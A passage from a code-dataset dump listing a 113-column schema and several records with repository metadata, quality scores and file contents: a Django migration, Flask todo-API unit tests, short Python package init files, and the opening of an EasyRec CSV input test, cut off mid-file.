Schema (113 columns):

| column | dtype |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| qsc_code_num_words_quality_signal | int64 |
| qsc_code_num_chars_quality_signal | float64 |
| qsc_code_mean_word_length_quality_signal | float64 |
| qsc_code_frac_words_unique_quality_signal | float64 |
| qsc_code_frac_chars_top_2grams_quality_signal | float64 |
| qsc_code_frac_chars_top_3grams_quality_signal | float64 |
| qsc_code_frac_chars_top_4grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_5grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_6grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_7grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_8grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_9grams_quality_signal | float64 |
| qsc_code_frac_chars_dupe_10grams_quality_signal | float64 |
| qsc_code_frac_chars_replacement_symbols_quality_signal | float64 |
| qsc_code_frac_chars_digital_quality_signal | float64 |
| qsc_code_frac_chars_whitespace_quality_signal | float64 |
| qsc_code_size_file_byte_quality_signal | float64 |
| qsc_code_num_lines_quality_signal | float64 |
| qsc_code_num_chars_line_max_quality_signal | float64 |
| qsc_code_num_chars_line_mean_quality_signal | float64 |
| qsc_code_frac_chars_alphabet_quality_signal | float64 |
| qsc_code_frac_chars_comments_quality_signal | float64 |
| qsc_code_cate_xml_start_quality_signal | float64 |
| qsc_code_frac_lines_dupe_lines_quality_signal | float64 |
| qsc_code_cate_autogen_quality_signal | float64 |
| qsc_code_frac_lines_long_string_quality_signal | float64 |
| qsc_code_frac_chars_string_length_quality_signal | float64 |
| qsc_code_frac_chars_long_word_length_quality_signal | float64 |
| qsc_code_frac_lines_string_concat_quality_signal | float64 |
| qsc_code_cate_encoded_data_quality_signal | float64 |
| qsc_code_frac_chars_hex_words_quality_signal | float64 |
| qsc_code_frac_lines_prompt_comments_quality_signal | float64 |
| qsc_code_frac_lines_assert_quality_signal | float64 |
| qsc_codepython_cate_ast_quality_signal | float64 |
| qsc_codepython_frac_lines_func_ratio_quality_signal | float64 |
| qsc_codepython_cate_var_zero_quality_signal | bool |
| qsc_codepython_frac_lines_pass_quality_signal | float64 |
| qsc_codepython_frac_lines_import_quality_signal | float64 |
| qsc_codepython_frac_lines_simplefunc_quality_signal | float64 |
| qsc_codepython_score_lines_no_logic_quality_signal | float64 |
| qsc_codepython_frac_lines_print_quality_signal | float64 |
| qsc_code_num_words | int64 |
| qsc_code_num_chars | int64 |
| qsc_code_mean_word_length | int64 |
| qsc_code_frac_words_unique | null |
| qsc_code_frac_chars_top_2grams | int64 |
| qsc_code_frac_chars_top_3grams | int64 |
| qsc_code_frac_chars_top_4grams | int64 |
| qsc_code_frac_chars_dupe_5grams | int64 |
| qsc_code_frac_chars_dupe_6grams | int64 |
| qsc_code_frac_chars_dupe_7grams | int64 |
| qsc_code_frac_chars_dupe_8grams | int64 |
| qsc_code_frac_chars_dupe_9grams | int64 |
| qsc_code_frac_chars_dupe_10grams | int64 |
| qsc_code_frac_chars_replacement_symbols | int64 |
| qsc_code_frac_chars_digital | int64 |
| qsc_code_frac_chars_whitespace | int64 |
| qsc_code_size_file_byte | int64 |
| qsc_code_num_lines | int64 |
| qsc_code_num_chars_line_max | int64 |
| qsc_code_num_chars_line_mean | int64 |
| qsc_code_frac_chars_alphabet | int64 |
| qsc_code_frac_chars_comments | int64 |
| qsc_code_cate_xml_start | int64 |
| qsc_code_frac_lines_dupe_lines | int64 |
| qsc_code_cate_autogen | int64 |
| qsc_code_frac_lines_long_string | int64 |
| qsc_code_frac_chars_string_length | int64 |
| qsc_code_frac_chars_long_word_length | int64 |
| qsc_code_frac_lines_string_concat | null |
| qsc_code_cate_encoded_data | int64 |
| qsc_code_frac_chars_hex_words | int64 |
| qsc_code_frac_lines_prompt_comments | int64 |
| qsc_code_frac_lines_assert | int64 |
| qsc_codepython_cate_ast | int64 |
| qsc_codepython_frac_lines_func_ratio | int64 |
| qsc_codepython_cate_var_zero | int64 |
| qsc_codepython_frac_lines_pass | int64 |
| qsc_codepython_frac_lines_import | int64 |
| qsc_codepython_frac_lines_simplefunc | int64 |
| qsc_codepython_score_lines_no_logic | int64 |
| qsc_codepython_frac_lines_print | int64 |
| effective | string |
| hits | int64 |
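The rows below are wide records flattened out of this table; each is shown as its metadata fields, the verbatim file `content`, and then the two runs of quality-signal values in the schema order above (the raw `*_quality_signal` scores, followed by their int64 filter flags). As a minimal sketch, a shard of rows with this schema could be inspected like so (the parquet file name is hypothetical; the storage format of this slice isn't shown here):

```python
import pandas as pd

# Hypothetical shard name; assumes the rows are stored as parquet.
df = pd.read_parquet("sample_shard.parquet")
print(df.shape)  # expected: (n_rows, 113)

# Each *_quality_signal column has a filter-flag twin without the suffix.
raw_cols = [c for c in df.columns if c.endswith("_quality_signal")]
flag_cols = [c[: -len("_quality_signal")] for c in raw_cols]
print(df[["hexsha", "lang", "size"]].head())
print(df[raw_cols[:3] + flag_cols[:3]].head())
```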
Row 1: hexsha=87be78313a7c5f5bb12cfb834160ced23b13c364 | size=5,961 | ext=py | lang=Python
max_stars_repo: path=isiscb/isisdata/migrations/0087_auto_20200125_1935.py | name=bgopalachary/IsisCB | head_hexsha=c28e3f504eea60ebeff38318d8bb2071abb28ebb | licenses=["MIT"] | count=4 | event: min=2016-01-25T20:35:33.000Z, max=2020-04-07T15:39:52.000Z
max_issues_repo: path=isiscb/isisdata/migrations/0087_auto_20200125_1935.py | name=bgopalachary/IsisCB | head_hexsha=c28e3f504eea60ebeff38318d8bb2071abb28ebb | licenses=["MIT"] | count=41 | event: min=2015-08-19T17:34:41.000Z, max=2022-03-11T23:19:01.000Z
max_forks_repo: path=isiscb/isisdata/migrations/0087_auto_20200125_1935.py | name=bgopalachary/IsisCB | head_hexsha=c28e3f504eea60ebeff38318d8bb2071abb28ebb | licenses=["MIT"] | count=2 | event: min=2020-11-25T20:18:18.000Z, max=2021-06-24T15:15:41.000Z
content:
# -*- coding: utf-8 -*-
# Generated by Django 1.11.23 on 2020-01-25 19:35
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('isisdata', '0086_auto_20200112_2037'),
]
operations = [
migrations.AlterField(
model_name='authority',
name='classification_system',
field=models.CharField(blank=True, choices=[(b'SPWT', b'Weldon Thesaurus Terms (2002-present)'), (b'SPWC', b'Weldon Classification System (2002-present)'), (b'GUE', b'Guerlac Committee Classification System (1953-2001)'), (b'NEU', b'Neu'), (b'MW', b'Whitrow Classification System (1913-1999)'), (b'SHOT', b'SHOT Thesaurus Terms'), (b'FHSA', b'Forum for the History of Science in America'), (b'SAC', b'Search App Concept'), (b'PN', b'Proper name')], db_index=True, default=b'SPWC', help_text=b'Specifies the classification system that is the source of the authority. Used to group resources by the Classification system. The system used currently is the Weldon System. All the other ones are for reference or archival purposes only.', max_length=4, null=True),
),
migrations.AlterField(
model_name='authority',
name='tracking_state',
field=models.CharField(blank=True, choices=[(b'HS', b'HSTM Upload'), (b'PT', b'Printed'), (b'AU', b'Authorized'), (b'PD', b'Proofed'), (b'FU', b'Fully Entered'), (b'BD', b'Bulk Data Update'), (b'NO', b'No')], db_index=True, max_length=2, null=True),
),
migrations.AlterField(
model_name='authority',
name='type_controlled',
field=models.CharField(blank=True, choices=[(b'PE', b'Person'), (b'IN', b'Institution'), (b'TI', b'Time Period'), (b'GE', b'Geographic Term'), (b'SE', b'Serial Publication'), (b'CT', b'Classification Term'), (b'CO', b'Concept'), (b'CW', b'Creative Work'), (b'EV', b'Event'), (b'CR', b'Cross-reference')], db_index=True, help_text=b'Specifies authority type. Each authority thema has its own list of controlled type vocabulary.', max_length=2, null=True, verbose_name=b'type'),
),
migrations.AlterField(
model_name='historicalauthority',
name='classification_system',
field=models.CharField(blank=True, choices=[(b'SPWT', b'Weldon Thesaurus Terms (2002-present)'), (b'SPWC', b'Weldon Classification System (2002-present)'), (b'GUE', b'Guerlac Committee Classification System (1953-2001)'), (b'NEU', b'Neu'), (b'MW', b'Whitrow Classification System (1913-1999)'), (b'SHOT', b'SHOT Thesaurus Terms'), (b'FHSA', b'Forum for the History of Science in America'), (b'SAC', b'Search App Concept'), (b'PN', b'Proper name')], db_index=True, default=b'SPWC', help_text=b'Specifies the classification system that is the source of the authority. Used to group resources by the Classification system. The system used currently is the Weldon System. All the other ones are for reference or archival purposes only.', max_length=4, null=True),
),
migrations.AlterField(
model_name='historicalauthority',
name='tracking_state',
field=models.CharField(blank=True, choices=[(b'HS', b'HSTM Upload'), (b'PT', b'Printed'), (b'AU', b'Authorized'), (b'PD', b'Proofed'), (b'FU', b'Fully Entered'), (b'BD', b'Bulk Data Update'), (b'NO', b'No')], db_index=True, max_length=2, null=True),
),
migrations.AlterField(
model_name='historicalauthority',
name='type_controlled',
field=models.CharField(blank=True, choices=[(b'PE', b'Person'), (b'IN', b'Institution'), (b'TI', b'Time Period'), (b'GE', b'Geographic Term'), (b'SE', b'Serial Publication'), (b'CT', b'Classification Term'), (b'CO', b'Concept'), (b'CW', b'Creative Work'), (b'EV', b'Event'), (b'CR', b'Cross-reference')], db_index=True, help_text=b'Specifies authority type. Each authority thema has its own list of controlled type vocabulary.', max_length=2, null=True, verbose_name=b'type'),
),
migrations.AlterField(
model_name='historicalperson',
name='classification_system',
field=models.CharField(blank=True, choices=[(b'SPWT', b'Weldon Thesaurus Terms (2002-present)'), (b'SPWC', b'Weldon Classification System (2002-present)'), (b'GUE', b'Guerlac Committee Classification System (1953-2001)'), (b'NEU', b'Neu'), (b'MW', b'Whitrow Classification System (1913-1999)'), (b'SHOT', b'SHOT Thesaurus Terms'), (b'FHSA', b'Forum for the History of Science in America'), (b'SAC', b'Search App Concept'), (b'PN', b'Proper name')], db_index=True, default=b'SPWC', help_text=b'Specifies the classification system that is the source of the authority. Used to group resources by the Classification system. The system used currently is the Weldon System. All the other ones are for reference or archival purposes only.', max_length=4, null=True),
),
migrations.AlterField(
model_name='historicalperson',
name='tracking_state',
field=models.CharField(blank=True, choices=[(b'HS', b'HSTM Upload'), (b'PT', b'Printed'), (b'AU', b'Authorized'), (b'PD', b'Proofed'), (b'FU', b'Fully Entered'), (b'BD', b'Bulk Data Update'), (b'NO', b'No')], db_index=True, max_length=2, null=True),
),
migrations.AlterField(
model_name='historicalperson',
name='type_controlled',
field=models.CharField(blank=True, choices=[(b'PE', b'Person'), (b'IN', b'Institution'), (b'TI', b'Time Period'), (b'GE', b'Geographic Term'), (b'SE', b'Serial Publication'), (b'CT', b'Classification Term'), (b'CO', b'Concept'), (b'CW', b'Creative Work'), (b'EV', b'Event'), (b'CR', b'Cross-reference')], db_index=True, help_text=b'Specifies authority type. Each authority thema has its own list of controlled type vocabulary.', max_length=2, null=True, verbose_name=b'type'),
),
]
avg_line_length: 97.721311 | max_line_length: 771 | alphanum_fraction: 0.659453
qsc_*_quality_signal (raw values, schema order): 859 | 5,961 | 4.514552 | 0.181607 | 0.092831 | 0.05802 | 0.067303 | 0.949974 | 0.949974 | 0.93115 | 0.93115 | 0.908458 | 0.908458 | 0 | 0.023289 | 0.171616 | 5,961 | 60 | 772 | 99.35 | 0.762049 | 0.011575 | 0 | 0.849057 | 1 | 0.056604 | 0.489217 | 0.014604 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.037736 | 0 | 0.09434 | 0
qsc_* filter flags (schema order): 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
effective: 0 | hits: 8
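Row 1 is an auto-generated Django migration, and its signals read accordingly: cate_autogen fires, and the dupe_5grams through dupe_10grams fractions sit around 0.91-0.95, which is what trips the six consecutive 1s in the flag run. A rough sketch of how such a duplicated-n-gram fraction can be computed, in the RedPajama style of "fraction of characters inside duplicated word n-grams" (the pipeline's exact tokenization and overlap handling aren't given here, so treat this as illustrative):

```python
import re
from collections import Counter

def frac_chars_dupe_ngrams(text: str, n: int) -> float:
    """Approximate fraction of word characters covered by repeated n-grams."""
    words = re.findall(r"\w+", text)
    grams = [tuple(words[i:i + n]) for i in range(len(words) - n + 1)]
    counts = Counter(grams)
    def chars(g):
        return sum(len(w) for w in g)
    total = sum(chars(g) * c for g, c in counts.items())
    dupes = sum(chars(g) * c for g, c in counts.items() if c > 1)
    return dupes / total if total else 0.0

# The repeated AlterField(...) blocks above push this toward 1 for n = 5..10.
```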
Row 2: hexsha=87f4412218cb770d498325ce33f07051ef73554b | size=9,290 | ext=py | lang=Python
max_stars_repo: path=tests/resources/test_todo_items.py | name=andela-ojoloko/Todo-Api | head_hexsha=eef0bbf89d5c40249316211dfc9d5b8385775ad7 | licenses=["MIT"] | count=null | event: min=null, max=null
max_issues_repo: path=tests/resources/test_todo_items.py | name=andela-ojoloko/Todo-Api | head_hexsha=eef0bbf89d5c40249316211dfc9d5b8385775ad7 | licenses=["MIT"] | count=null | event: min=null, max=null
max_forks_repo: path=tests/resources/test_todo_items.py | name=andela-ojoloko/Todo-Api | head_hexsha=eef0bbf89d5c40249316211dfc9d5b8385775ad7 | licenses=["MIT"] | count=null | event: min=null, max=null
content:
import json
import jwt
from ..base import BaseTestCase
from api.models import Todo, User, db, TodoItem
from api.util import generate_token
from datetime import datetime, timedelta
class TodosTestCase(BaseTestCase):
def setUp(self):
db.drop_all()
db.create_all()
self.user_1 = User(
first_name="existing_first_name",
last_name="existing_last_name",
password= "existing_password",
email="test1@yahoo.com"
)
self.user_2 = User(
first_name="existing_first_name",
last_name="existing_last_name",
password= "existin_password",
email="test2@yahoo.com"
)
self.todo_1 = Todo(
title="firt todo"
)
self.todo_2 = Todo(
title="second todo"
)
self.user_1.todos.append(self.todo_1)
self.user_2.todos.append(self.todo_2)
self.user_1.save()
self.user_2.save()
self.token_1 = generate_token(self.user_1)
self.token_2 = generate_token(self.user_2)
self.headers_1 = { "Authorization": f"Bearer {self.token_1}"}
self.headers_2 = { "Authorization": f"Bearer {self.token_2}"}
def test_creating_todo_item_succesfully(self):
"""
tests succesfull creation of todo item
"""
todo_item = {"content": "cut the onions"}
response = self.client.post(f'/api/todos/{self.todo_1.id}/todo_items', json=todo_item, headers=self.headers_1)
json_data = response.get_json()
self.assertStatus(response, 201)
self.assertEqual(json_data["todo_item"]["content"], todo_item["content"])
self.assertEqual(json_data["message"], "todo item created")
def test_creating_todo_item_for_non_existent_todo(self):
"""
tests creating todo item for non existent todo
"""
todo_item = {"content": "cut the onions"}
response = self.client.post('/api/todos/190000099/todo_items', json=todo_item, headers=self.headers_1)
json_data = response.get_json()
self.assertStatus(response, 404)
self.assertEqual(json_data["message"], "todo does not exist")
def test_creating_todo_item_with_empty_content(self):
"""
tests creating todo item with empty content
"""
todo_item = {"content": ""}
response = self.client.post(f'/api/todos/{self.todo_1.id}/todo_items', json=todo_item, headers=self.headers_1)
json_data = response.get_json()
self.assertStatus(response, 422)
self.assertEqual(json_data["message"], "validation failed")
self.assertEqual(json_data["errors"]["content"][0], "Data not provided.")
def test_successfull_deletion_of_todo_item(self):
"""
tests deletion of single todo succesfully
"""
todo_item_1 = TodoItem(content="test content 1", todo_id=self.todo_1.id)
todo_item_1.save()
todo_item_2 = TodoItem(content="test content 2", todo_id=self.todo_2.id)
todo_item_2.save()
response = self.client.delete(f'/api/todos/{self.todo_1.id}/todo_items/{todo_item_1.id}', headers=self.headers_1)
json_data = response.get_json()
self.assertStatus(response, 200)
self.assertEqual(json_data["message"], "todo item deleted")
def test_deletion_of_todo_item_with_non_existent_todo_id_in_url(self):
"""
tests deletion of todo todo item with no existent todo_id in url
"""
todo_item_1 = TodoItem(content="test content 1", todo_id=self.todo_1.id)
todo_item_1.save()
todo_item_2 = TodoItem(content="test content 2", todo_id=self.todo_2.id)
todo_item_2.save()
response = self.client.delete(f'/api/todos/999999999/todo_items/{todo_item_1.id}', headers=self.headers_1)
json_data = response.get_json()
self.assertStatus(response, 404)
self.assertEqual(json_data["message"], "todo does not exist")
def test_deletion_of_todo_item_with_non_existent_todo_item_id_in_url(self):
"""
tests deletion of todo todo item with no existent todo_item_id in url
"""
todo_item_1 = TodoItem(content="test content 1", todo_id=self.todo_1.id)
todo_item_1.save()
todo_item_2 = TodoItem(content="test content 2", todo_id=self.todo_2.id)
todo_item_2.save()
response = self.client.delete(f'/api/todos/{self.todo_1.id}/todo_items/99999999', headers=self.headers_1)
json_data = response.get_json()
self.assertStatus(response, 404)
self.assertEqual(json_data["message"], "todo item does not exist")
def test_deletion_of_todo_item_not_created_by_user(self):
"""
tests deletion of todo item not created by user
"""
todo_item_1 = TodoItem(content="test content 1", todo_id=self.todo_1.id)
todo_item_1.save()
todo_item_2 = TodoItem(content="test content 2", todo_id=self.todo_2.id)
todo_item_2.save()
response = self.client.delete(f'/api/todos/{self.todo_2.id}/todo_items/{todo_item_2.id}', headers=self.headers_1)
json_data = response.get_json()
self.assertStatus(response, 401)
self.assertEqual(json_data["message"], "unauthorized")
def test_updating_of_todo_item_not_created_by_user(self):
"""
tests update of todo item not created by user
"""
todo_item_1 = TodoItem(content="test content 1", todo_id=self.todo_1.id)
todo_item_1.save()
todo_item_2 = TodoItem(content="test content 2", todo_id=self.todo_2.id)
todo_item_2.save()
todo_item_update = {
"complete": True
}
response = self.client.put(f'/api/todos/{self.todo_2.id}/todo_items/{todo_item_2.id}', headers=self.headers_1,
json=todo_item_update)
json_data = response.get_json()
self.assertStatus(response, 401)
self.assertEqual(json_data["message"], "unauthorized")
def test_update_of_todo_item_with_non_existent_todo_id_in_url(self):
"""
tests update of todo todo item with no existent todo_id in url
"""
todo_item_1 = TodoItem(content="test content 1", todo_id=self.todo_1.id)
todo_item_1.save()
todo_item_2 = TodoItem(content="test content 2", todo_id=self.todo_2.id)
todo_item_2.save()
todo_item_update = {
"complete": True
}
response = self.client.put(f'/api/todos/999999999/todo_items/{todo_item_1.id}', headers=self.headers_1,
json=todo_item_update)
json_data = response.get_json()
self.assertStatus(response, 404)
self.assertEqual(json_data["message"], "todo does not exist")
def test_update_of_todo_item_with_non_existent_todo_item_id_in_url(self):
"""
tests update of todo todo item with no existent todo_item_id in url
"""
todo_item_1 = TodoItem(content="test content 1", todo_id=self.todo_1.id)
todo_item_1.save()
todo_item_2 = TodoItem(content="test content 2", todo_id=self.todo_2.id)
todo_item_2.save()
todo_item_update = {
"complete": True
}
response = self.client.put(f'/api/todos/{self.todo_1.id}/todo_items/99999999', headers=self.headers_1,
json=todo_item_update)
json_data = response.get_json()
self.assertStatus(response, 404)
self.assertEqual(json_data["message"], "todo item does not exist")
def test_update_of_todo_item_successfully(self):
"""
tests update of todo todo item succesfully
"""
todo_item_1 = TodoItem(content="test content 1", todo_id=self.todo_1.id)
todo_item_1.save()
todo_item_2 = TodoItem(content="test content 2", todo_id=self.todo_2.id)
todo_item_2.save()
todo_item_update = {
"complete": True
}
response = self.client.put(f'/api/todos/{self.todo_1.id}/todo_items/{todo_item_1.id}', headers=self.headers_1,
json=todo_item_update)
json_data = response.get_json()
self.assertStatus(response, 200)
self.assertEqual(json_data["message"], "todo_item updated")
self.assertEqual(json_data["todo_item"]["complete"], todo_item_update["complete"])
def test_update_of_todo_item_with_invalid_data(self):
"""
tests update of todo todo item with invalid data
"""
todo_item_1 = TodoItem(content="test content 1", todo_id=self.todo_1.id)
todo_item_1.save()
todo_item_2 = TodoItem(content="test content 2", todo_id=self.todo_2.id)
todo_item_2.save()
todo_item_update = {
"complete": "how"
}
response = self.client.put(f'/api/todos/{self.todo_1.id}/todo_items/{todo_item_1.id}', headers=self.headers_1,
json=todo_item_update)
json_data = response.get_json()
self.assertStatus(response, 422)
self.assertEqual(json_data["message"], "validation failed")
avg_line_length: 37.764228 | max_line_length: 121 | alphanum_fraction: 0.634553
qsc_*_quality_signal (raw values, schema order): 1,253 | 9,290 | 4.413408 | 0.088587 | 0.137432 | 0.037432 | 0.084629 | 0.85208 | 0.827848 | 0.805063 | 0.775769 | 0.768354 | 0.751356 | 0 | 0.028827 | 0.253175 | 9,290 | 245 | 122 | 37.918367 | 0.768233 | 0.067061 | 0 | 0.582278 | 1 | 0 | 0.180951 | 0.068185 | 0 | 0 | 0 | 0.04898 | 0.170886 | 1 | 0.082278 | false | 0.012658 | 0.037975 | 0 | 0.126582 | 0
qsc_* filter flags (schema order): 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0
effective: 0 | hits: 8
Row 3: hexsha=3584bacc695f53779eb775bb2ecaeccddf750137 | size=134 | ext=py | lang=Python
max_stars_repo: path=pwnedapi/exceptions/__init__.py | name=DirtySoc/pwnedapi | head_hexsha=38b8f814788defa62f0a5a7c103093ab01b0baa7 | licenses=["MIT"] | count=11 | event: min=2018-04-14T23:26:03.000Z, max=2021-06-13T08:29:01.000Z
max_issues_repo: path=pwnedapi/exceptions/__init__.py | name=DirtySoc/pwnedapi | head_hexsha=38b8f814788defa62f0a5a7c103093ab01b0baa7 | licenses=["MIT"] | count=22 | event: min=2018-05-06T07:50:12.000Z, max=2019-07-14T09:15:58.000Z
max_forks_repo: path=pwnedapi/exceptions/__init__.py | name=DirtySoc/pwnedapi | head_hexsha=38b8f814788defa62f0a5a7c103093ab01b0baa7 | licenses=["MIT"] | count=15 | event: min=2018-04-14T22:11:40.000Z, max=2021-12-22T16:58:50.000Z
content:
from pwnedapi.exceptions.PasswordException import PasswordException
from pwnedapi.exceptions.RequestException import RequestException
avg_line_length: 44.666667 | max_line_length: 67 | alphanum_fraction: 0.910448
qsc_*_quality_signal (raw values, schema order): 12 | 134 | 10.166667 | 0.5 | 0.196721 | 0.360656 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059701 | 134 | 2 | 68 | 67 | 0.968254 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 1 | 0 | 1 | 0
qsc_* filter flags (schema order): 1 | 0 | 1 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 1 | 0
effective: 0 | hits: 8
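Row 3 is a two-line `__init__.py`, and its flags fire on size rather than duplication: num_words, mean_word_length, frac_chars_top_3grams, and num_lines are flagged, along with several Python-specific signals. The tokenizer behind the word-level signals isn't documented in this slice, but a plain alphanumeric-run split reproduces the reported values exactly, which suggests a definition along these lines:

```python
import re

content = (
    "from pwnedapi.exceptions.PasswordException import PasswordException\n"
    "from pwnedapi.exceptions.RequestException import RequestException\n"
)
words = re.findall(r"\w+", content)

num_words = len(words)                                # 12, as reported
mean_word_length = sum(map(len, words)) / num_words   # 10.166667, as reported
frac_words_unique = len(set(words)) / num_words       # 0.5, as reported
print(num_words, round(mean_word_length, 6), frac_words_unique)
```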
Row 4: hexsha=35cd950d5cb45f024d05d88335b6eab453090e8a | size=107 | ext=py | lang=Python
max_stars_repo: path=model/__init__.py | name=stromguy/super-resolution | head_hexsha=102b1211334d0e786c453744505beb389d2e83b1 | licenses=["Apache-2.0"] | count=1,230 | event: min=2018-12-30T02:04:13.000Z, max=2022-03-31T11:13:35.000Z
max_issues_repo: path=model/__init__.py | name=stromguy/super-resolution | head_hexsha=102b1211334d0e786c453744505beb389d2e83b1 | licenses=["Apache-2.0"] | count=91 | event: min=2019-01-15T13:15:03.000Z, max=2022-02-18T11:10:54.000Z
max_forks_repo: path=model/__init__.py | name=stromguy/super-resolution | head_hexsha=102b1211334d0e786c453744505beb389d2e83b1 | licenses=["Apache-2.0"] | count=347 | event: min=2019-01-12T16:13:05.000Z, max=2022-03-29T15:33:30.000Z
content:
from model.common import resolve
from model.common import resolve_single
from model.common import evaluate
avg_line_length: 26.75 | max_line_length: 39 | alphanum_fraction: 0.859813
qsc_*_quality_signal (raw values, schema order): 16 | 107 | 5.6875 | 0.4375 | 0.296703 | 0.494505 | 0.692308 | 0.615385 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.11215 | 107 | 3 | 40 | 35.666667 | 0.957895 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0
qsc_* filter flags (schema order): 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0
effective: 0 | hits: 7
Row 5: hexsha=ea78215c86af16a01464b28d85b053bc387f1883 | size=256 | ext=py | lang=Python
max_stars_repo: path=bitmovin_api_sdk/encoding/manifests/dash/periods/adaptationsets/video/__init__.py | name=jaythecaesarean/bitmovin-api-sdk-python | head_hexsha=48166511fcb9082041c552ace55a9b66cc59b794 | licenses=["MIT"] | count=11 | event: min=2019-07-03T10:41:16.000Z, max=2022-02-25T21:48:06.000Z
max_issues_repo: path=bitmovin_api_sdk/encoding/manifests/dash/periods/adaptationsets/video/__init__.py | name=jaythecaesarean/bitmovin-api-sdk-python | head_hexsha=48166511fcb9082041c552ace55a9b66cc59b794 | licenses=["MIT"] | count=8 | event: min=2019-11-23T00:01:25.000Z, max=2021-04-29T12:30:31.000Z
max_forks_repo: path=bitmovin_api_sdk/encoding/manifests/dash/periods/adaptationsets/video/__init__.py | name=jaythecaesarean/bitmovin-api-sdk-python | head_hexsha=48166511fcb9082041c552ace55a9b66cc59b794 | licenses=["MIT"] | count=13 | event: min=2020-01-02T14:58:18.000Z, max=2022-03-26T12:10:30.000Z
content:
from bitmovin_api_sdk.encoding.manifests.dash.periods.adaptationsets.video.video_api import VideoApi
from bitmovin_api_sdk.encoding.manifests.dash.periods.adaptationsets.video.video_adaptation_set_list_query_params import VideoAdaptationSetListQueryParams
avg_line_length: 85.333333 | max_line_length: 154 | alphanum_fraction: 0.914063
qsc_*_quality_signal (raw values, schema order): 32 | 256 | 7 | 0.5625 | 0.107143 | 0.133929 | 0.160714 | 0.625 | 0.625 | 0.625 | 0.625 | 0.625 | 0.625 | 0 | 0 | 0.03125 | 256 | 2 | 155 | 128 | 0.903226 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0
qsc_* filter flags (schema order): 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0
effective: 0 | hits: 7
Row 6: hexsha=576b422978fe2e33298574ee1a29bf8efe029f04 | size=11,521 | ext=py | lang=Python
max_stars_repo: path=easy_rec/python/test/csv_input_test.py | name=xia-huang-411303/EasyRec | head_hexsha=7b2050dddc0bfec9e551e2199a36414a3ee82588 | licenses=["Apache-2.0"] | count=285 | event: min=2021-10-11T03:39:43.000Z, max=2022-03-31T09:12:33.000Z
max_issues_repo: path=easy_rec/python/test/csv_input_test.py | name=xia-huang-411303/EasyRec | head_hexsha=7b2050dddc0bfec9e551e2199a36414a3ee82588 | licenses=["Apache-2.0"] | count=84 | event: min=2021-10-15T03:48:58.000Z, max=2022-03-31T12:38:53.000Z
max_forks_repo: path=easy_rec/python/test/csv_input_test.py | name=xia-huang-411303/EasyRec | head_hexsha=7b2050dddc0bfec9e551e2199a36414a3ee82588 | licenses=["Apache-2.0"] | count=71 | event: min=2021-10-15T03:33:44.000Z, max=2022-03-31T08:37:11.000Z
content:
# -*- encoding:utf-8 -*-
# Copyright (c) Alibaba, Inc. and its affiliates.
"""Define cv_input, the base class for cv tasks."""
import tensorflow as tf
from google.protobuf import text_format
from easy_rec.python.input.csv_input import CSVInput
from easy_rec.python.input.csv_input_ex import CSVInputEx
from easy_rec.python.protos.dataset_pb2 import DatasetConfig
from easy_rec.python.protos.feature_config_pb2 import FeatureConfig
from easy_rec.python.utils import config_util
from easy_rec.python.utils.test_utils import RunAsSubprocess
if tf.__version__ >= '2.0':
from tensorflow.python.framework.ops import disable_eager_execution
disable_eager_execution()
tf = tf.compat.v1
class CSVInputTest(tf.test.TestCase):
def __init__(self, methodName='CSVInputTest'):
